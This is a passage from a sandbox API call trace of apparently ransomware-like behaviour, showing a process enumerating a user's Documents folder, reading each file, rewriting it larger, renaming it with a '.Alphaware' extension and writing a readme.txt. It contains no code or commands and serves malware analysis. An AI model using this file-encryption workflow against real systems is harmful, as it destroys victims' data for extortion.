nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="beaeacczBwDfQo39", cAlternateFileName="BEAEAC~1")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92220ea0, ftCreationTime.dwHighDateTime=0x1d973e9, ftLastAccessTime.dwLowDateTime=0x3304c590, ftLastAccessTime.dwHighDateTime=0x1d97504, ftLastWriteTime.dwLowDateTime=0x3304c590, ftLastWriteTime.dwHighDateTime=0x1d97504, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Duc5tpM3PDmAXr1.ots", cAlternateFileName="DUC5TP~1.OTS")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc456c20, ftCreationTime.dwHighDateTime=0x1d971a5, ftLastAccessTime.dwLowDateTime=0xfe4cb7d0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0x84788a80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19cc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvxZB--pZ8D4tDAf.xls.Alphaware", cAlternateFileName="JVXZB-~1.ALP")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x154d8050, ftCreationTime.dwHighDateTime=0x1d97185, ftLastAccessTime.dwLowDateTime=0x16de1a40, ftLastAccessTime.dwHighDateTime=0x1d974d9, ftLastWriteTime.dwLowDateTime=0x84821000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbbe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="miKlgwo4kuAJyz.xls.Alphaware", cAlternateFileName="MIKLGW~1.ALP")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8467e0e0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8467e0e0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8467e0e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe34fea0, ftCreationTime.dwHighDateTime=0x1d975fa, ftLastAccessTime.dwLowDateTime=0xcd9fc5a0, ftLastAccessTime.dwHighDateTime=0x1d97658, ftLastWriteTime.dwLowDateTime=0xcd9fc5a0, ftLastWriteTime.dwHighDateTime=0x1d97658, nFileSizeHigh=0x0, nFileSizeLow=0x4a9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZfG0gp1VfGWa8doIagS.ots", cAlternateFileName="XZFG0G~1.OTS")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de25ad0, ftCreationTime.dwHighDateTime=0x1d97264, ftLastAccessTime.dwLowDateTime=0xac3fb2b0, ftLastAccessTime.dwHighDateTime=0x1d97605, ftLastWriteTime.dwLowDateTime=0x848df6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x181a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8zS.rtf.Alphaware", cAlternateFileName="Z8ZSRT~1.ALP")) returned 1 [0084.484] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1de25ad0, ftCreationTime.dwHighDateTime=0x1d97264, ftLastAccessTime.dwLowDateTime=0xac3fb2b0, ftLastAccessTime.dwHighDateTime=0x1d97605, ftLastWriteTime.dwLowDateTime=0x848df6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x181a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="z8zS.rtf.Alphaware", cAlternateFileName="Z8ZSRT~1.ALP")) returned 0 [0084.484] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0084.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0084.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0084.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eaf8) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x285f34c0, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xa7c6e9b0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0xa7c6e9b0, ftLastWriteTime.dwHighDateTime=0x1d975e2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfec1c0, ftCreationTime.dwHighDateTime=0x1d97202, ftLastAccessTime.dwLowDateTime=0x35776ec0, ftLastAccessTime.dwHighDateTime=0x1d9766e, ftLastWriteTime.dwLowDateTime=0x35776ec0, ftLastWriteTime.dwHighDateTime=0x1d9766e, nFileSizeHigh=0x0, nFileSizeLow=0xad38, dwReserved0=0x0, dwReserved1=0x0, cFileName="1wWkN7zA3pJvJ0l2.pdf", cAlternateFileName="1WWKN7~1.PDF")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85dcb960, ftCreationTime.dwHighDateTime=0x1d96c32, ftLastAccessTime.dwLowDateTime=0xe57e1bf0, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0xe57e1bf0, ftLastWriteTime.dwHighDateTime=0x1d9759e, nFileSizeHigh=0x0, nFileSizeLow=0xb697, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Y7NVeZda.ppt", cAlternateFileName="2Y7NVE~1.PPT")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecbd0, ftCreationTime.dwHighDateTime=0x1d96933, ftLastAccessTime.dwLowDateTime=0xb8b73d0, ftLastAccessTime.dwHighDateTime=0x1d9697c, ftLastWriteTime.dwLowDateTime=0xb8b73d0, ftLastWriteTime.dwHighDateTime=0x1d9697c, nFileSizeHigh=0x0, nFileSizeLow=0xb87c, dwReserved0=0x0, dwReserved1=0x0, cFileName="7Cu9qgyf.ods", cAlternateFileName="")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5652cdc0, ftCreationTime.dwHighDateTime=0x1d96e70, ftLastAccessTime.dwLowDateTime=0x9c1979f0, ftLastAccessTime.dwHighDateTime=0x1d975c6, ftLastWriteTime.dwLowDateTime=0x9c1979f0, ftLastWriteTime.dwHighDateTime=0x1d975c6, nFileSizeHigh=0x0, nFileSizeLow=0x1139d, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xJk20t-OlNiKzpOa_.odp", cAlternateFileName="7XJK20~1.ODP")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19230a70, ftCreationTime.dwHighDateTime=0x1d96c84, ftLastAccessTime.dwLowDateTime=0xf1687e70, ftLastAccessTime.dwHighDateTime=0x1d97269, ftLastWriteTime.dwLowDateTime=0xf1687e70, ftLastWriteTime.dwHighDateTime=0x1d97269, nFileSizeHigh=0x0, nFileSizeLow=0x8b18, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMtfYZ.doc", cAlternateFileName="")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c407d30, ftCreationTime.dwHighDateTime=0x1d9725b, ftLastAccessTime.dwLowDateTime=0x7ebf7a90, ftLastAccessTime.dwHighDateTime=0x1d975a2, ftLastWriteTime.dwLowDateTime=0x7ebf7a90, ftLastWriteTime.dwHighDateTime=0x1d975a2, nFileSizeHigh=0x0, nFileSizeLow=0x12bac, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdqAQbUtMr09oklG_Ot.xls", cAlternateFileName="IDQAQB~1.XLS")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fcc40, ftCreationTime.dwHighDateTime=0x1d96d63, ftLastAccessTime.dwLowDateTime=0x220b28c0, ftLastAccessTime.dwHighDateTime=0x1d9769d, ftLastWriteTime.dwLowDateTime=0x220b28c0, ftLastWriteTime.dwHighDateTime=0x1d9769d, nFileSizeHigh=0x0, nFileSizeLow=0x148f5, dwReserved0=0x0, dwReserved1=0x0, cFileName="k3 HQLaJEyY.odp", cAlternateFileName="K3HQLA~1.ODP")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97486200, ftCreationTime.dwHighDateTime=0x1d97496, ftLastAccessTime.dwLowDateTime=0x137463b0, ftLastAccessTime.dwHighDateTime=0x1d975dc, ftLastWriteTime.dwLowDateTime=0x137463b0, ftLastWriteTime.dwHighDateTime=0x1d975dc, nFileSizeHigh=0x0, nFileSizeLow=0xc0a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="kxX8q7znVEV6F AiDQyX.xlsx", cAlternateFileName="KXX8Q7~1.XLS")) returned 1 [0084.485] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde00db30, ftCreationTime.dwHighDateTime=0x1d96c28, ftLastAccessTime.dwLowDateTime=0xdc576d20, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xdc576d20, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x99a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2V3IQcrptDn.rtf", cAlternateFileName="T2V3IQ~1.RTF")) returned 1 [0084.486] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaddd62c0, ftCreationTime.dwHighDateTime=0x1d97308, ftLastAccessTime.dwLowDateTime=0x492e00, ftLastAccessTime.dwHighDateTime=0x1d9744d, ftLastWriteTime.dwLowDateTime=0x492e00, ftLastWriteTime.dwHighDateTime=0x1d9744d, nFileSizeHigh=0x0, nFileSizeLow=0x18887, dwReserved0=0x0, dwReserved1=0x0, cFileName="T6C4G_g_0sfV1dVJsM.pptx", cAlternateFileName="T6C4G_~1.PPT")) returned 1 [0084.486] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05659d0, ftCreationTime.dwHighDateTime=0x1d966cb, ftLastAccessTime.dwLowDateTime=0x87df7c30, ftLastAccessTime.dwHighDateTime=0x1d9750f, ftLastWriteTime.dwLowDateTime=0x87df7c30, ftLastWriteTime.dwHighDateTime=0x1d9750f, nFileSizeHigh=0x0, nFileSizeLow=0x14712, dwReserved0=0x0, dwReserved1=0x0, cFileName="xexTT Q3v7p50maSoJ5.rtf", cAlternateFileName="XEXTTQ~1.RTF")) returned 1 [0084.486] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e8d0 | out: lpFindFileData=0x23e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0084.486] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0084.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7f8) returned 1 [0084.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23ea18) returned 1 [0084.486] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf", dwFileAttributes=0x80) returned 1 [0084.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.487] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23eef20 | out: lpFileInformation=0x23eef20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x9dfec1c0, ftCreationTime.dwHighDateTime=0x1d97202, ftLastAccessTime.dwLowDateTime=0x35776ec0, ftLastAccessTime.dwHighDateTime=0x1d9766e, ftLastWriteTime.dwLowDateTime=0x35776ec0, ftLastWriteTime.dwHighDateTime=0x1d9766e, nFileSizeHigh=0x0, nFileSizeLow=0xad38)) returned 1 [0084.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.487] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.487] GetFileType (hFile=0x254) returned 0x1 [0084.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.488] GetFileType (hFile=0x254) returned 0x1 [0084.488] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0xad38 [0084.488] ReadFile (in: hFile=0x254, lpBuffer=0x23ef1e8, nNumberOfBytesToRead=0xad38, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ef1e8*, lpNumberOfBytesRead=0x23e9f8*=0xad38, lpOverlapped=0x0) returned 1 [0084.489] CloseHandle (hObject=0x254) returned 1 [0084.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.514] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.515] GetFileType (hFile=0x254) returned 0x1 [0084.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.515] GetFileType (hFile=0x254) returned 0x1 [0084.518] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.518] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9dfec1c0, ftCreationTime.dwHighDateTime=0x1d97202, ftLastAccessTime.dwLowDateTime=0x35776ec0, ftLastAccessTime.dwHighDateTime=0x1d9766e, ftLastWriteTime.dwLowDateTime=0x8492b9a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe7c8)) returned 1 [0084.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.518] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\1wWkN7zA3pJvJ0l2.pdf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\1wwkn7za3pjvj0l2.pdf.alphaware")) returned 1 [0084.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e908) returned 1 [0084.519] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.520] GetFileType (hFile=0x254) returned 0x1 [0084.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e878) returned 1 [0084.520] GetFileType (hFile=0x254) returned 0x1 [0084.521] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt", dwFileAttributes=0x80) returned 1 [0084.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.522] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt"), fInfoLevelId=0x0, lpFileInformation=0x249b7d0 | out: lpFileInformation=0x249b7d0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x85dcb960, ftCreationTime.dwHighDateTime=0x1d96c32, ftLastAccessTime.dwLowDateTime=0xe57e1bf0, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0xe57e1bf0, ftLastWriteTime.dwHighDateTime=0x1d9759e, nFileSizeHigh=0x0, nFileSizeLow=0xb697)) returned 1 [0084.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.522] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.522] GetFileType (hFile=0x254) returned 0x1 [0084.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.523] GetFileType (hFile=0x254) returned 0x1 [0084.523] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0xb697 [0084.523] ReadFile (in: hFile=0x254, lpBuffer=0x249ba68, nNumberOfBytesToRead=0xb697, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x249ba68*, lpNumberOfBytesRead=0x23e9f8*=0xb697, lpOverlapped=0x0) returned 1 [0084.524] CloseHandle (hObject=0x254) returned 1 [0084.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.551] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.553] GetFileType (hFile=0x254) returned 0x1 [0084.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.553] GetFileType (hFile=0x254) returned 0x1 [0084.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.556] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85dcb960, ftCreationTime.dwHighDateTime=0x1d96c32, ftLastAccessTime.dwLowDateTime=0xe57e1bf0, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0x8499ddc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf448)) returned 1 [0084.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.556] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\2Y7NVeZda.ppt.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\2y7nvezda.ppt.alphaware")) returned 1 [0084.557] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods", dwFileAttributes=0x80) returned 1 [0084.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.557] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods"), fInfoLevelId=0x0, lpFileInformation=0x25479c0 | out: lpFileInformation=0x25479c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x6ecbd0, ftCreationTime.dwHighDateTime=0x1d96933, ftLastAccessTime.dwLowDateTime=0xb8b73d0, ftLastAccessTime.dwHighDateTime=0x1d9697c, ftLastWriteTime.dwLowDateTime=0xb8b73d0, ftLastWriteTime.dwHighDateTime=0x1d9697c, nFileSizeHigh=0x0, nFileSizeLow=0xb87c)) returned 1 [0084.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0084.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e948) returned 1 [0084.558] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.558] GetFileType (hFile=0x254) returned 0x1 [0084.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8b8) returned 1 [0084.558] GetFileType (hFile=0x254) returned 0x1 [0084.558] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eac8 | out: lpFileSizeHigh=0x23eac8*=0x0) returned 0xb87c [0084.559] ReadFile (in: hFile=0x254, lpBuffer=0x2547c48, nNumberOfBytesToRead=0xb87c, lpNumberOfBytesRead=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2547c48*, lpNumberOfBytesRead=0x23e9f8*=0xb87c, lpOverlapped=0x0) returned 1 [0084.560] CloseHandle (hObject=0x254) returned 1 [0084.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e878) returned 1 [0084.591] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.593] GetFileType (hFile=0x254) returned 0x1 [0084.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7e8) returned 1 [0084.593] GetFileType (hFile=0x254) returned 0x1 [0084.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7e8) returned 1 [0084.596] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods"), fInfoLevelId=0x0, lpFileInformation=0x23eb10 | out: lpFileInformation=0x23eb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ecbd0, ftCreationTime.dwHighDateTime=0x1d96933, ftLastAccessTime.dwLowDateTime=0xb8b73d0, ftLastAccessTime.dwHighDateTime=0x1d9697c, ftLastWriteTime.dwLowDateTime=0x849ea080, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf6c8)) returned 1 [0084.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e798) returned 1 [0084.596] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7Cu9qgyf.ods.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7cu9qgyf.ods.alphaware")) returned 1 [0084.597] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp", dwFileAttributes=0x80) returned 1 [0084.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8b8) returned 1 [0084.597] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\y- 0\\beaeacczBwDfQo39\\7xJk20t-OlNiKzpOa_.odp" (normalized: "c:\\users\\keecfmwgj\\documents\\y- 0\\beaeacczbwdfqo39\\7xjk20t-olnikzpoa_.odp"), fInfoLevelId=0x0, lpFileInformation=0x23eef98 | out: lpFileInformation=0x23eef98*(dwFileAttributes=0x80, 